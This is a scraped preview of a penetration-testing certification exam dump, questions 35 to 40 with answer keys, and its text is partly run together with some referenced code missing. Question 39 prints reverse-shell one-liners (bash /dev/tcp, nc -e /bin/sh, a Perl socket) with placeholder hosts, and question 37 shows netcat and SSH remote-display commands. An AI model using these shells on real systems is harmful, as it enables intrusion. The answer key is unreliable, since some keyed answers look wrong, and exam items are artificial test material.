100%(2)2 out of 2 people found this document helpful
This preview shows page 15 - 19 out of 31 pages.
D.Web server configurations may reveal sensitive information.Correct Answer: DSection: (none)ExplanationExplanation/Reference:QUESTION 35A penetration tester is in the process of writing a report that outlines the overall level of risk to operations. Inwhich of the following areas of the report should the penetration tester put this?A. AppendicesB.Executive summaryC.Technical summaryD.Main bodyCorrect Answer: BSection: (none)ExplanationExplanation/Reference:VCEConvert.com
QUESTION 36A penetration tester is performing a black box assessment on a web-based banking application. The tester wasonly provided with a URL to the login page. Given the below code and output:Which of the following is the tester intending to do?A.Horizontally escalate privileges.B.Scrape the page for hidden fields.C.Analyze HTTP response code.D.Search for HTTP headers.Correct Answer: DSection: (none)ExplanationExplanation/Reference:QUESTION 37A penetration tester wants to launch a graphic console window from a remotely compromised host with IP10.0.0.20 and display the terminal on the local computer with IP 192.168.1.10. Which of the following wouldaccomplish this task?A.From the remote computer, run the following commands:export XHOST 192.168.1.10:0.0xhost+TerminalB.From the local computer, run the following command:ssh -L4444:127.0.0.1:6000 -X [email protected] xtermC.From the remote computer, run the following command:ssh -R6000:127.0.0.1:4444 -p 6000 [email protected] “xhost+; xterm”D.From the local computer, run the following command:nc -l -p 6000Then, from the remote computer, run the following command:xterm | nc 192.168.1.10 6000Correct Answer: AVCEConvert.com
Section: (none)ExplanationExplanation/Reference:QUESTION 38A penetration tester is testing a banking application and uncovers a vulnerability. The tester is logged in as anon-privileged user who should have no access to any data. Given the data below from the web interceptionproxy:Which of the following types of vulnerabilities is being exploited?A.Forced browsing vulnerabilityB.Parameter pollution vulnerabilityC.File upload vulnerabilityD.Cookie enumerationCorrect Answer: DSection: (none)ExplanationExplanation/Reference:QUESTION 39A penetration tester compromises a system that has unrestricted network access over port 443 to any host.The penetration tester wants to create a reverse shell from the victim back to the attacker. Which of thefollowing methods would the penetration tester MOST likely use?A.perl -e 'use SOCKET'; $i='<SOURCEIP>; $p='443;B.ssh [email protected]<DESTINATIONIP> -p 443C. nc-e /bin/sh <SOURCEIP> 443VCEConvert.com
D.bash -i >& /dev/tcp/<DESTINATIONIP>/443 0>&1Correct Answer: DSection: (none)ExplanationExplanation/Reference:Reference: QUESTION 40A penetration tester observes that the content security policy header is missing during a web applicationpenetration test. Which of the following techniques would the penetration tester MOST likely perform?